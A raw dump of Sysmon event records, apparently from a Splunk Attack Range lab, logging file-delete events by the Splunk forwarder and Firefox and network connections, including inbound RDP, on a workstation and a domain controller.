23542300x8000000000000000805689Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:11.736{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE8CFEC7CFB0ADD24317884DB0CDE04D,SHA256=E5D3AA8F41313BD3423D651559318938E5E62AE1141CB30C8B0EB62C88D6029C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:11.087{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=399BD9B17C035C9FCB2E174921B1E008,SHA256=927C7FCA577E4BDB61237CD5F12CEF224F9C4B2E0B1543F10BC7A08E5D3B24BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805691Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:12.767{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49F59C8F1824EC53CF1814B5D43FCE24,SHA256=487729F53711D67CD6B1BA799ABD17489040764B96B74E7F938CD3D4D47A6DDC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:04.661{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50875-false10.0.1.12-8000- 23542300x80000000000000001045452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:12.119{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77755F6141131CEBAD9EA855B6507DEE,SHA256=E7FAB54EFB52329BB9DD11A8D0D7726B53D0FA6927C400F0E51399758F9A74AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805690Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:10.400{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57128-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805692Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:13.778{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05B08E9ABB97F7C0FF4603E018CEF0FB,SHA256=E6B0571FDC2429C54A7FFED30F4CA9BB069F2AD459BC0D4075340A47458DAABC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A8F627E6E4213B2AC2504487F1A9784A,SHA256=6F71E27A506352C54D642832BB81AC44ACC0A12C8B7EA2D42CDF3D5F94CCF402,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=513BD2C5A9C48BDF096BCEDAC76F0CF7,SHA256=E70F846539EC7A5F6F0F308A03219C4DAEDE5F22FA5C2A61FFACB6FBD1CF3DDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6BE4FC5CBBEAEB5AB4831E685F910899,SHA256=AED81F78594BCB48535B420C1476B59FBCA9EF31D93B4859F3A2A3EDCA511BC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2D9F7911EB8E5A7D2AC81AD88F3EC8ED,SHA256=C411800FF74B2D54FC3D5825467EF96C3BE04907DF332F2ACA05EF7741B26252,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7DA8994B1E68B7F1A2F95E77BA90B236,SHA256=8903ACED0B3FCFAE7FE60E08B54B22D1E198085B9AFBDBA7FEF7526038DBC7AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=98B7FC9DEFD9B08319CFE953676B6412,SHA256=F33C8C695FAFEFE00D985D4C68C4ECAFFC42172FAF00C385DB32E2ED2BE05B2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7A629B560B0948CFD64413383579600E,SHA256=994350B43A868F6932536EABF42832F90EC16FDC23B2DED4C066540D23F79C4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=177A28C3A06E2013287FC7765111EBFA,SHA256=9922B3A9A93EC30CC39E796113275DB5149A41097AA5E7287F301287E5CACB1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=365737606F4D43E19876F9D5DCC826C6,SHA256=23C7A0F154453F662BA743E9F0233FB09E67C50E964AAFF5E341F6EEE0D46EA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DE5309582FCBE68D975F55C2565CDB93,SHA256=8CEFC8D55A38C466AB72CFBB3A138BCA5913A992CA131518DFA83F8E847CE753,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.500{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=14852CB422EE770748A1E188D5E44DF0,SHA256=712AEB9D79710021E590889D481F4C4F046735491C56569D1D7EF45A25C04A0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:13.154{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB3E52C8388A092FD5D9A5F1ABEC1118,SHA256=8F13133F2551D6661377EBB3A70C57F0A622B583B3ADB3162450DB54662303B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805696Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:14.778{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DDE8B65B020127CC3C46887A41FE2CC,SHA256=E1CACCF2C247D334DDC85073B024235725380370D5DBC52C57F77F5AD4BFEDA2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:06.685{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57129-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001045466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:14.168{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3058F78D001EB07DD183786178A5B24F,SHA256=4B21A55FB528AF08B8C8DF0E335892FBFA84AEA1547AA5B47EDB20C3C827F0B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805695Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:12.356{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-23361-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000805694Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:14.138{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39708B4C01F50225A54CBA928464A82C,SHA256=E4D431FB905A8819EE79EB450B62805FED4AA730FC8268599AE220F0A0BC0F3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805693Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:14.138{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E59A5D0905F06A3C83CDF77FFA2BC5E7,SHA256=4E7EA43DFF780D547D73A1915F67AE4C96CC5B0DC1532614548291E7813BB1AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805698Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:15.857{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F8CF2B6C38F339279DF1E966B3FB528,SHA256=6BDEC82FDCE586AD0D2033CE4BEE9727718D03CFF0B05CC7A062B06D4364E989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:15.320{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08CD5168587700352B4170704D1AD96F,SHA256=9488B4AAE8FA2670D74D01C850C44736573D97E59B2BFAB1E27A364E8F1EF613,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:15.319{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C95318CED7F6C2FC53AFE3401453DB3,SHA256=D1E7BDF900B80EF92B4C43FC648A04C7AD2A90D20EC9594D1D31D37ABF385A4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:15.199{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=370D111ACD4F1E78F014FC163973B992,SHA256=6B3E3DFE247F5D235D128051EC0AF96FF195FC7ACCF9B1F7FA3AE7F047AE4038,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805697Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:13.279{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57129-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000805699Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:16.857{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=810A49FF490C0CD6833D925DB0C56675,SHA256=94C95F555BBA55F2C7FD79FE6ABF195A80CBD6F747CDF929743D3943D1993A7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:07.858{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50876-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001045472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:07.858{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50876-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001045471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:16.217{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF30732DEEFF1DB7539197AD887C9168,SHA256=04DEA21A65DDEC7EADC88C8B026A45EC00D781C1C5E1F383340011A5131F1505,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805700Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:17.857{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D562C3CCF6571D0952244417AD4F4FC0,SHA256=928EF3EDA7E682CE6E38AA1848CABE653149BC1005F898FC76FCB37AF3A699BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:09.794{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50877-false10.0.1.12-8000- 23542300x80000000000000001045474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:17.235{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6651A899981A307023E4DC04636D1CE5,SHA256=F9BD263F2707A6F44BF7345CC4ADA29B1E46EC553E6AA4BE7951E85C322C5CEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805702Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:18.872{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90E7B9D2C7D4289E83FCFC205EC289E1,SHA256=C97644722AA33057418F5775D90FE186420EDA2267CC318EA9FA7C553E372394,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:18.238{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ADD0D9744C2B81F4F6FFB94686407F0,SHA256=0E3EE47A112E18E5BD8B50685F491DE075101D880516EB5EB66A505512DAF048,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805701Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:16.364{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57130-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001045476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:18.118{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805703Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:19.888{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C977D733BDABE7C23C180746AAE4F0FD,SHA256=59200BEEF0079D3E7C7A10A24498AB26DE02F890E032216BB92354FC2650882A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:19.239{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F5A839D7B1F3FE07B16B13E9776DF22,SHA256=803605269EBA8C0F17328490933AC78AE890B75AE303AB664C25D26EF88F8864,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805705Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:20.903{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0658C8AD31EADDCD3FE122D6351B32C9,SHA256=D863A62330DFFA5FC6E2AE6273E5D133E8A25BFF70139C723438996B95152568,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:12.580{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-54571-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001045481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:20.637{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8BD9A643BE4EFA8342C81F63B9616F4F,SHA256=2B099FA0EB2DC2319777163EA602FA8A0D553A316321F7E013F77AFB18641052,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:20.637{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08CD5168587700352B4170704D1AD96F,SHA256=9488B4AAE8FA2670D74D01C850C44736573D97E59B2BFAB1E27A364E8F1EF613,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:20.253{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB58D82D096FC98FE07CA710EB60F4E4,SHA256=2FD2A497C9E02E9829C6A79F6739D5C1B6AA3807413D6B030770A1EE866CAFD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805704Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:20.278{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805706Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:21.950{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65C48C83EB4BE54954CDDF77C591F8CF,SHA256=A190E41644160F573051C15C0ACC3475C70D70E15CE16931F73D2C7585E0D8BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:21.268{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76D25031572E4E0DF125629D12E5CC82,SHA256=828791CCDCBA9CED6F8DD00FE3690A394C440589D3BE3AE210506E6220FAA33B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805708Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:22.950{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08E4EF75F946D5ABAA7B269CABFC056C,SHA256=299BB6FF39B0D390912CF4E53869529CF94578D47A501472EA7D298355CA8E19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:22.498{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=B2C5A949DAB8A0CF7A12F4885F3BCC1F,SHA256=A2803526A509AF88AE438F7AF2C4A88346DA8B350FC058A5D29867A91E0B5B1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:22.282{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0586F821D32415A90FF6A46964B5F51,SHA256=D6BA58FDAF512E403188FEA98F030A91D1B2B8222413B3D839D5C06585B1437F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805707Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:20.412{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program 